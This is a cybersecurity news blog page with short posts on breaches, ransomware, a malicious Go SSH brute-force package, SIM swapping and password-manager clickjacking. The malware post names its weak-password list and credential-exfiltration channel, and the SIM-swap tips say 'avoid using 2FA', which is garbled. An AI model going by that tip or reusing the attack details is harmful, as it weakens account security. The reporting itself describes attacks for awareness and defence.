Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Privacy
Android Compliance Developers Google Play Store Privacy

Google to Confirm Identity of Every Android App Developer

 







Google announced a new step to make Android apps safer: starting next year, developers who distribute apps to certified Android phones and tablets, even outside Google Play, will need to verify their legal identity. The change ties every app on certified devices to a named developer account, while keeping Android’s ability to run apps from other stores or direct downloads intact. 

What this means for everyday users and small developers is straightforward. If you download an app from a website or a third-party store, the app will now be linked to a developer who has provided a legal name, address, email and phone number. Google says hobbyists and students will have a lighter account option, but many independent creators may choose to register as a business to protect personal privacy. Certified devices are the ones that ship with Google services and pass Google’s compatibility tests; devices that do not include Google Play services may follow different rules. 

Google’s stated reason is security. The company reported that apps installed from the open internet are far more likely to contain malware than apps on the Play Store, and it says those risks come mainly from people hiding behind anonymous developer identities. By requiring identity verification, Google intends to make it harder for repeat offenders to publish harmful apps and to make malicious actors easier to track. 

The rollout is phased so developers and device makers can prepare. Early access invitations begin in October 2025, verification opens to all developers in March 2026, and the rules take effect for certified devices in Brazil, Indonesia, Singapore and Thailand in September 2026. Google plans a wider global rollout in 2027. If you are a developer, review Google’s new developer pages and plan to verify your account well before your target markets enforce the rule. 

A similar compliance pattern already exists in some places. For example, Apple requires developers who distribute apps in the European Union to provide a “trader status” and contact details to meet the EU Digital Services Act. These kinds of rules aim to increase accountability, but they also raise questions about privacy, the costs for small creators, and how “open” mobile platforms should remain. Both companies are moving toward tighter oversight of app distribution, with the goal of making digital marketplaces safer and more accountable.

This change marks one of the most significant shifts in Android’s open ecosystem. While users will still have the freedom to install apps from multiple sources, developers will now be held accountable for the software they release. For users, it could mean greater protection against scams and malicious apps. For developers, especially smaller ones, it signals a new balance between maintaining privacy and ensuring trust in the Android platform.


Read more »
Supply Chain
Cyber Attacks highlighting Automotive Cybersecurity risks IT Systems Jaguar Land Rover Cybersecurity Breach disrupts Production Manufacturing Retail Operations Supply Chain

Cybersecurity Breach Leads to Major Disruption at Jaguar Land Rover


 

In a major cybersecurity incident which has caused major disruption to the operations of Jaguar Land Rover, it highlights the growing vulnerability of automakers across the world to cyberattacks, underlining the increasing need to maintain communication channels between automakers and their customers. 

In a statement released on September 2, the British luxury car manufacturer said that the attack had severely disrupted its core computer systems. This led to the suspension of production across the company's UK assembly plants and ripple effects throughout the entire organisation, including global operations, supply chain coordination, and manufacturing engineering. 

Having taken proactive measures to counter the threat, JLR disabled several key systems, resulting in widespread problems in how suppliers and logistics partners could communicate in real-time with one another.

Although the company has not yet provided any details concerning the ransomware or any other forms of malicious code that were responsible for the breach, the company has stated that its internal security experts are working closely with external cyber experts to investigate it, with critical systems currently being restored in a "controlled fashion" under the guidance of external cyber experts.

A major impact of the disruption has already been felt by Jaguar Land Rover’s workforce and production schedule. The Halewood plant, located near Liverpool, was instructed to close early Monday morning via email. Local news reports indicate that the shutdown will continue until midweek, as local reports have suggested. 

There have been a number of issues that have affected the company’s manufacturing operations, but also its retail outlets, which have disrupted the flow of vehicles to customers in the wake of the incident. A JLR official statement confirmed that the company was dealing with a “cyber incident” and that critical systems had been shut down promptly to contain the situation. 

However, the automaker stressed that, although there are ongoing investigations into the issue, there is no indication that any customer data has been compromised at the moment. Although the company acknowledged that both retail and production activities have been severely disrupted, it explained that global applications are gradually being restored in a controlled manner, a process that it described as controlled. 

Last year, JLR generated revenues of more than £28.99 billion ($38.75 billion), employing over 39,000 people across the globe. However, recent financial struggles have resulted in a 49 per cent drop in pre-tax profits for the company in the second quarter, owing in part to the fact that U.S. exports are slowed by tariffs. 

In addition to this attack, JLR has also joined Marks & Spencer, the Co-op, and Harrods among the growing list of high-profile British brands targeted by cyber attacks this year, adding the retailer to the list. In a recent report, the cyberattack is reported to have begun on Sunday, coinciding with the beginning of September, a time when the automotive industry in the UK is experiencing heightened importance, due to the introduction of new registration plate identifiers. 

A biannual change in vehicle prices usually occurs in March and September, and it is widely acknowledged as one of the most important promotional windows for manufacturers, as it drives a significant surge in vehicle sales. Therefore, the disruption has come at a particularly sensitive time for Jaguar Land Rover, since a large portion of the company's annual sales are attributed to these particular months, which are more critical than usual.

As reported by the BBC, the automaker discovered the attack while it was still unfolding, which prompted it to shut down potentially affected IT systems to limit the consequences. In its statement issued on 2 September, Jaguar Land Rover confirmed that work is underway to return global applications to service in a controlled manner. 

Even though retail and production operations remain severely affected, no evidence has been found that customer data has been compromised. There is a growing vulnerability in highly digitalised manufacturing environments, according to industry experts, and the incident underscores that. As a result of the integration of IT with operational technology, a single breach can freeze entire plants and ripple through the entire supply chain in a matter of seconds. 

As a result of any downtime, suppliers, retailers, and their partners are affected by loss of production, delayed sales, and disruptions. During his recent comment, Dray Agha, Senior Manager of Security Operations at Huntress, expressed his opinion that this example illustrates how one single IT system attack could shut down a multi-billion-dollar production line, causing direct sales to be negatively impacted, especially during a key period like a new registration period. 

It has been reported by SecurityScorecard’s Chief Threat Intelligence Officer, Ryan Sherstobitof, that in addition to forcing the shutdown of JLR’s Solihull factory, the cyberattack also prevented dealers in the UK from registering new cars and supplying parts. With no information available from the company as to what caused the breach or when it was expected to recover, the company did not provide details on the situation. 

After a cyber incident in March involving Jaguar Land Rover, which claimed that hackers had stolen the source code and tracking data, the disruption marks the second cyber incident to have struck Jaguar Land Rover this year. This recurrence raised concerns about the possibility of exploiting vulnerabilities that were previously exposed in the earlier breach, said Nick Tausek, Lead Security Automation Architect at Swimlane.

It is also important to emphasise, according to other cybersecurity specialists, that this episode highlights the urgency of strengthening cyber hygiene, robust authentication and authorisation practices, as well as tightening data flow protections. "Cyber resilience is fundamental to overall business resilience," said Jon Abbott, CEO of ThreatAware. He said that disruptions can be hugely destructive to a business. 

There are many manufacturers in the manufacturing sector that are so heavily dependent on the uptime of their operations that they would never want to become the subject of future headlines regarding cyber incidents. The recent developments at Jaguar Land Rover serve as a timely reminder that cybersecurity is no longer just a peripheral concern, but rather a vital component of operational continuity. 

It is becoming increasingly important for digital infrastructure to have resilience as cars become increasingly connected and production systems become more deeply intertwined with global supply chains, which has a direct impact on market stability and customer confidence. 

Manufacturers can do their part not just by implementing reactive containment measures, but also by investing in proactive measures—enhancing endpoint protection, implementing layered defences, and conducting rigorous penetration tests to identify hidden vulnerabilities in their systems. In addition to technology, it is equally important to cultivate a culture of cyber awareness throughout the organisation in order to ensure that every employee understands their role in safeguarding critical systems, regardless of the technology they use. 

It's widely believed that companies which embed cyber resilience into the very core of their business DNA will gain a competitive advantage over their peers in the long run. Investors and consumers alike will gravitate towards brands which can demonstrate resilience when dealing with ever-evolving digital threats. Ultimately, the incident represents more than a disruption, as it also highlights the need for cybersecurity to be deemed just as important as innovation, safety, and sustainability in the automotive industry as a whole.
Read more »
trending news
cybersecurity news Data Breach data breach news trending news

Zscaler Confirms Exposure in Salesloft-Linked Data Breach

 

Zscaler has confirmed that it is among the latest organizations to be impacted by a major supply chain attack exploiting the Salesloft Drift application, which integrates with Salesforce. 

According to the company, attackers managed to steal OAuth tokens tied to the third-party app, giving them access to Zscaler’s Salesforce environment. The security vendor explained that the compromised data mainly consisted of business-related information rather than sensitive personal or financial records. Specifically, the exposed details included names, work email addresses, job titles, phone numbers, location data, licensing and commercial details relating to Zscaler products, as well as plain-text content from certain customer support cases. However, Zscaler emphasized that no attachments, files, or images were accessed in the incident. 

Upon detecting the unauthorized activity, the company acted quickly by revoking the Drift app’s access and rotating other API tokens as a precaution. In addition, it claimed to have put in place new safeguards and strengthened protocols to reduce the likelihood of similar breaches in the future. 

While Zscaler noted that the incident appeared limited in scope and said there is no evidence so far of any misuse of the exposed data, it urged customers to exercise extra caution. The company warned that malicious actors could exploit the stolen information for phishing campaigns or social engineering attacks, and therefore advised clients to be vigilant about unsolicited emails, calls, or requests for confidential information. 

This breach is part of a wider campaign being tracked by security researchers as UNC6395, which is said to have compromised numerous Salesforce customer environments between August 8 and August 18. The attackers reportedly exfiltrated large volumes of customer data during that period, potentially affecting hundreds of organizations. 

More recently, it has also been revealed that the same campaign targeted a limited number of Google Workspace accounts through Salesloft Drift integrations, further underlining the scope of the threat. Given the scale and operational sophistication demonstrated, some experts have speculated that a nation-state threat actor could be behind the attacks. 

Zscaler’s disclosure follows similar admissions from other companies caught in the same campaign, highlighting the continuing risks posed by supply chain compromises in cloud-based business ecosystems.
Read more »
Open Source
Brute-force attack Credential stealing Data Breach data security Data Theft Golang Malicious Bots Open Source

Malicious Go Package Disguised as SSH Tool Steals Credentials via Telegram

 

Researchers have uncovered a malicious Go package disguised as an SSH brute-force tool that secretly collects and transmits stolen credentials to an attacker-controlled Telegram bot. The package, named golang-random-ip-ssh-bruteforce, first appeared on June 24, 2022, and was linked to a developer under the alias IllDieAnyway. Although the GitHub profile tied to this account has since been removed, the package is still accessible through Go’s official registry, raising concerns about supply chain security risks for developers who might unknowingly use it. 

The module is designed to scan random IPv4 addresses in search of SSH services operating on TCP port 22. Once it detects a running service, it attempts brute-force login using only two usernames, “root” and “admin,” combined with a list of weak and commonly used passwords. These include phrases such as “root,” “test,” “password,” “admin,” “12345678,” “1234,” “qwerty,” “webadmin,” “webmaster,” “techsupport,” “letmein,” and “Passw@rd.” If login succeeds, the malware immediately exfiltrates the target server’s IP address, username, and password through Telegram’s API to a bot called @sshZXC_bot, which forwards the stolen information to a user identified as @io_ping. Since Telegram communications are encrypted via HTTPS, the credential theft blends into ordinary web traffic, making detection much more difficult. 

The design of the tool helps it remain stealthy while maximizing efficiency. To bypass host identity checks, the module disables SSH host key verification by setting ssh.InsecureIgnoreHostKey as its callback. It continuously generates IPv4 addresses while attempting concurrent logins in an endless loop, increasing the chances of finding vulnerable servers. Interestingly, once it captures valid credentials for the first time, the malware terminates itself. This tactic minimizes its exposure, helping it avoid detection by defenders monitoring for sustained brute-force activity. 

Archival evidence suggests that the creator of this package has been active in the underground hacking community for years. Records link the developer to the release of multiple offensive tools, including an IP port scanner, an Instagram parser, and Selica-C2, a PHP-based botnet for command-and-control operations. Associated videos show tutorials on exploiting Telegram bots and launching SMS bomber attacks on Russian platforms. Analysts believe the attacker is likely of Russian origin, based on the language, platforms, and content of their activity. 

Security researchers warn that this Trojanized Go module represents a clear supply chain risk. Developers who unknowingly integrate it into their projects could unintentionally expose sensitive credentials to attackers, since the exfiltration traffic is hidden within legitimate encrypted HTTPS connections. This case underscores the growing threat of malicious open-source packages being planted in widely used ecosystems, where unsuspecting developers become conduits for large-scale credential theft.
Read more »
Vulnerabilities and Exploits
Business Security Data I/O Ransomware attack Supply Chain Vulnerabilities and Exploits

Data I/O Ransomware Attack Exposes Vulnerability in Global Electronics Supply Chain

 

Data I/O, a leading manufacturer specializing in device programming and security provisioning solutions, experienced a major ransomware attack in August 2025 that crippled core operations and raised industry-wide concerns about supply chain vulnerabilities in the technology sector.

The attack, first detected on August 16, 2025, used a sophisticated phishing campaign to compromise network credentials, enabling the attackers to exploit vulnerabilities in the company’s remote access systems and achieve lateral movement across network segments. 

This incident resulted in the encryption of critical proprietary data, including chip design schematics, manufacturing blueprints, sensitive communications, and firmware for products used by major clients such as Amazon, Apple, Google, and automotive manufacturers. 

Attack methodology 

Investigations mapped the attack to multiple MITRE ATT&CK techniques: T1566 for phishing, T1021 for remote services exploitation, T1486 for impact via data encryption, and possible use of T1078 via valid accounts. The attackers sent deceptive emails to Data I/O employees that tricked users into surrendering network credentials or accessing malicious links. After gaining access, the adversaries leveraged weaknesses in remote connectivity protocols to move laterally and encrypt essential files.

The ransomware incident caused widespread disruptions: internal and external communications, shipping, receiving, manufacturing production lines, and support functions were all impacted. The company activated incident response protocols, isolating affected systems and proactively taking critical platforms offline to prevent further spread. As of late August, some systems remained offline, without a clear timeline for full restoration. 

Broader implications 

Data I/O’s strategic role as a supply chain hub in electronics manufacturing made it a disproportionate target. Disruption reverberated across technology, automotive, and IoT sectors due to the company’s handling of security credentials and firmware for multi-billion-dollar products.

The incident underscores how ransomware operators increasingly target manufacturing entities, exploiting supply chain vulnerabilities to extract ransoms and maximize operational harm. The attackers reportedly demanded a ransom of $30 million, threatening to release encrypted data publicly if payment was not made within 72 hours. 

Data I/O engaged external cybersecurity experts and forensic professionals, initiated a full-scale investigation, and pledged transparency as more details emerged. The incident highlights urgent needs for improved remote access security, robust phishing defenses, and faster detection and response capabilities across the technology manufacturing sector. 

Analysts warn this attack may foreshadow future campaigns targeting critical infrastructure and high-tech supply chains, stressing the necessity for more resilient cybersecurity strategies.
Read more »
Salesloft security alert
Boeing data breach Drift AI hack Google Threat Intelligence OAuth token compromise Salesforce Salesforce credential theft Salesloft security alert

Hackers Exploit Drift AI Integration to Steal Salesforce Data in Major Campaign

 



Hackers have launched a widespread attack campaign stealing sensitive data from Salesforce instances by exploiting a third-party integration, according to Google’s Threat Intelligence Group.

The group of attackers, tracked by Google as UNC6395, abused compromised OAuth tokens linked to Salesloft’s Drift AI chat agent to infiltrate Salesforce environments. Their main objective was credential theft, enabling large-scale exfiltration of customer data.

“Google Threat Intelligence is aware of over 700 potentially impacted organizations,” said Austin Larsen, principal threat analyst at Google. He confirmed that the hackers automated the campaign using a Python-based tool to rapidly harvest information.

Researchers clarified that Salesforce itself was not compromised. Instead, attackers targeted authentication tokens, later searching for AWS access keys, passwords, and Snowflake platform tokens.

The incidents occurred primarily between August 8 and August 18, with Salesloft working alongside Salesforce to revoke compromised Drift tokens by August 20. Salesloft also issued a security alert instructing administrators to reauthenticate Salesforce connections.

Salesforce acknowledged detecting “unusual activity” tied to a small number of customer accounts. As a precaution, the company has temporarily removed Drift from its AppExchange marketplace and is cooperating with Salesloft to support affected customers.

Google researchers noted that attackers attempted to cover their tracks by deleting query jobs but confirmed that event logs remain intact, urging security teams to audit logs for signs of exposure.

Charles Carmakal, CTO of Mandiant Consulting, advised impacted organizations to follow remediation guidance, including revoking API keys, rotating credentials, and hardening access controls.

The latest Google update warns the compromise extends beyond Salesforce integrations, as OAuth tokens linked to “Drift Email” were also targeted. A limited number of Google Workspace accounts were breached on August 9, though Google confirmed there was no compromise of Workspace or Alphabet systems overall.

Experts emphasize that any organization using Salesloft Drift should assume their authentication tokens may have been exposed and act immediately to secure accounts.
Read more »
Technology
AI Android Cloud Internet SIM Swapping Technology

Beware of SIM swapping attacks, your phone is at risk


In today’s digital world, most of our digital life is connected to our phone numbers, so keeping them safe becomes a necessity. Sad news: hackers don’t need your phone to access your number. 

What is SIM swapping?

Also known as SIMjacking, SIM swapping is a tactic where a cybercriminal convinces your ISP to port your phone number to their own SIM card. This results in the user losing access to their phone number and service provider, while the cybercriminal gains full access. 

To convince the ISP of a SIM swap, the threat actor has to know about you. They can get the information from data breaches available on the dark web. You might also get tricked by a phishing scam and end up giving your info, or the threat actor may harvest your social media in case you have public information. 

Once the information is received, the threat actor calls the customer support, requesting to move your number to a new SIM card. In most cases, your carrier doesn’t need much convincing. 

Threats concerning SIM swapping

An attacker with your phone number can impersonate you to friends and family, and extort money. Your phone security is also at risk, as most online services ask for your phone number for account recovery. 

SIM swapping is dangerous as SMS based two-factor-authentication is still in use. Many services require us to activate 2FA on our accounts, and sometimes through SMS. 

You can also check your carrier’s website to see if there’s any option to deactivate SIM change requests. This way, you can secure your phone number. 

But when this isn’t available with your carrier, look out for the option to enable a PIN or secret phrase. A few companies allow users to set these, and call you back to confirm about your account.

How to stay safe from SIM swapping?

Avoid using 2FA; use passkeys.

Use a SIM PIN for your phone to lock your SIM card.

Read more »
trending tech news
Emerging tech news Technology trending news trending tech news

Business and IT Leaders Diverge on Cloud and Security Priorities

 

Enterprises are preparing to expand their cloud investments, even as many remain dissatisfied with the financial returns of recent technology deployments, according to a new report from Unisys. The study, which surveyed 1,000 C-suite and IT executives across eight global markets, highlights a widening disconnect between business leaders and technology teams on priorities for cloud, AI, and security. 

Less than half of the 300 business executives surveyed said they were pleased with the return on investment from cloud, automation, and generative AI projects. 

Still, more than 75% of respondents said their organizations intend to increase cloud spending this year. 

Unisys suggests this optimism may be undermined by outdated systems and processes. 

“Organizations are still operating on outdated foundations and processes,” said Manju Naglapur, SVP and GM for cloud, applications, and infrastructure at Unisys. 

To unlock true value, he added, companies must modernize infrastructure, align IT and business priorities, and adopt proactive cybersecurity strategies. 

Misaligned Views on AI and Security 

The report found sharp differences in how IT and business executives perceive progress. More than two in five business leaders said their companies had made strong advances in AI pilots, while fewer than a third of IT leaders agreed. Concerns over readiness to support AI workloads also surfaced, with over 40% of IT leaders saying their current infrastructure cannot handle the demands of data-intensive AI systems. Security perceptions diverged even further. 

Nearly two-thirds of business executives described rigid or outdated security frameworks as barriers to innovation and data sharing. Only about a third of IT leaders shared that view. 

The Cost of a Reactive Approach 

Despite differences, executives largely agreed that cybersecurity strategies remain too reactive. Almost 90% said their organizations are prepared to respond to attacks once they occur, but lack a robust framework to prevent them. 

The stakes are high. More than two in five companies reported that IT outages can cost as much as $500,000 per hour in unplanned downtime. “The next wave of technological disruption is already underway,” Naglapur noted, “yet many organizations are still relying on outdated foundations.”
Read more »
data security
3D Guns 3D Printing AI technology Cyber Security Cybersecurity measures Data collection Data Recovery data security

New Forensic System Tracks Ghost Guns Made With 3D Printing Using SIDE

 

The rapid rise of 3D printing has transformed manufacturing, offering efficient ways to produce tools, spare parts, and even art. But the same technology has also enabled the creation of “ghost guns” — firearms built outside regulated systems and nearly impossible to trace. These weapons have already been linked to crimes, including the 2024 murder of UnitedHealthcare CEO Brian Thompson, sparking concern among policymakers and law enforcement. 

Now, new research suggests that even if such weapons are broken into pieces, investigators may still be able to extract critical identifying details. Researchers from Washington University in St. Louis, led by Netanel Raviv, have developed a system called Secure Information Embedding and Extraction (SIDE). Unlike earlier fingerprinting methods that stored printer IDs, timestamps, or location data directly into printed objects, SIDE is designed to withstand tampering. 

Even if an object is deliberately smashed, the embedded information remains recoverable, giving investigators a powerful forensic tool. The SIDE framework is built on earlier research presented at the 2024 IEEE International Symposium on Information Theory, which introduced techniques for encoding data that could survive partial destruction. This new version adds enhanced security mechanisms, creating a more resilient system that could be integrated into 3D printers. 

The approach does not rely on obvious markings but instead uses loss-tolerant mathematical embedding to hide identifying information within the material itself. As a result, even fragments of plastic or resin may contain enough data to help reconstruct its origin. Such technology could help reduce the spread of ghost guns and make it more difficult for criminals to use 3D printing for illicit purposes. 

However, the system also raises questions about regulation and personal freedom. If fingerprinting becomes mandatory, even hobbyist printers used for harmless projects may be subject to oversight. This balance between improving security and protecting privacy is likely to spark debate as governments consider regulation. The potential uses of SIDE go far beyond weapons tracing. Any object created with a 3D printer could carry an invisible signature, allowing investigators to track timelines, production sources, and usage. 

Combined with artificial intelligence tools for pattern recognition, this could give law enforcement powerful new forensic capabilities. “This work opens up new ways to protect the public from the harmful aspects of 3D printing through a combination of mathematical contributions and new security mechanisms,” said Raviv, assistant professor of computer science and engineering at Washington University. He noted that while SIDE cannot guarantee protection against highly skilled attackers, it significantly raises the technical barriers for criminals seeking to avoid detection.
Read more »
User Security
Cyber Fraud Financial Scam India Online Trading Scam Trading App User Security

India's Biggest Cyber Fraud: Businessman Duped of ₹25 Crore Through Fake Trading App

 

A Kochi-based pharmaceutical company owner has suffered a loss of ₹25 crore in what is being described as the largest single-person cyber fraud case in India. 

The incident involved a sophisticated online trading scam, executed through a fake trading application that lured the victim with promises of lucrative returns. Despite being an experienced trader, the businessman fell prey to deception after engaging with the fraudulent app for nearly two years.

The scam unfolded over four months, during which the victim was lured by substantial profits displayed on his initial investments. These early gains convinced him of the app’s legitimacy, prompting more substantial investments.

Investigators from the Cyber Cell revealed that the app consistently showed double profits, creating an illusion of credibility and financial success. This psychological manipulation is a common tactic used by cyber fraudsters to build trust and encourage deeper engagement from unsuspecting victims. 

Trouble began when the businessman attempted to withdraw his funds, only to be met with repeated delays and a variety of excuses from the operators of the fake platform. As withdrawal requests were consistently stonewalled, suspicion grew. It was only after persistent failed attempts to access his money that the reality of the fraud became clear to the victim. 

Upon reporting the crime, swift action was taken by law enforcement. The Indian Cyber Crime Coordination Centre was immediately alerted and subsequently forwarded the information to the Thiruvananthapuram Cyber Operations Headquarters. A formal case was registered, and efforts have been initiated to freeze the remaining funds before they could be routed to additional accounts.

Investigation revealed that the fraudulent app was under the control of a foreign national, indicating possible international links and making the operation broader and more complex. The case has prompted a larger crackdown on similar cyber threats, with the Cyber Cell widening its probe to trace the perpetrators and prevent further occurrences. 

This incident highlights the growing sophistication of online financial scams in India, emphasizing the need for increased vigilance, especially even among experienced investors. Awareness and prompt reporting remain essential defenses against such evolving cyber threats.
Read more »
Vulnerabilities and Exploits
Browser Clickjacking links Login Credentials Password Manager Vulnerabilities and Exploits

Password Managers Face Clickjacking Flaw, Millions of Users at Risk



For years, password managers have been promoted as one of the safest ways to store and manage login details. They keep everything in one place, help generate strong credentials, and protect against weak or reused passwords. But new research has uncovered a weakness in several widely used browser extensions that could expose sensitive information for millions of people.


Details about the flows

Security researchers recently found that 11 different password manager extensions share a vulnerability linked to the way they rely on the Document Object Model (DOM). The DOM is part of how web pages are structured, and in this case, it opens a door to a technique known as “clickjacking.”

Clickjacking works by tricking users into clicking on invisible or disguised elements of a web page. For example, a malicious site may look legitimate but contain hidden layers. A single misplaced click can unintentionally activate the password manager’s autofill function. Once that happens, the manager may begin entering saved credentials directly into the attacker’s page.

The danger lies in how quietly this happens. Users often close the site without realizing that their passwords or even stored credit card information and personal details like addresses or phone numbers may already have been copied by attackers.


The scale of the issue

The affected list includes some of the most recognized password managers in the industry. An estimated 40 million users worldwide could be impacted. While some companies have already addressed the issue through updates, not all providers have released fixes yet. For example, RoboForm has patched its extension, and Bitwarden has rolled out a new version. However, others remain in the process of responding.


Protecting yourself

There is no universal fix for clickjacking, but users can take important steps to reduce risk:

1. Be cautious with links: Avoid clicking on unfamiliar or suspicious links, even if they appear genuine. It is always safer to type the website address directly or use trusted bookmarks.

2. Update your tools: Make sure your password manager extension is up to date. Updates often contain security fixes that block known vulnerabilities.

3. Change autofill settings: If you use a Chromium-based browser, switch your password manager’s autofill to “on-click.” This ensures that details are only filled in when you actively choose to do so.

4. Disable unnecessary autofill: Consider turning off automatic completion for personal information like email addresses in your browser settings.


The bottom line

Password managers are still an essential tool for safe online habits, but like any technology, they are not immune to flaws. Staying alert, practicing careful browsing, and keeping your software updated can substantially lower the risk. Until every provider has addressed the vulnerability, users should take extra precautions to keep their digital identities secure.



Read more »
Subscribe to: Comments (Atom)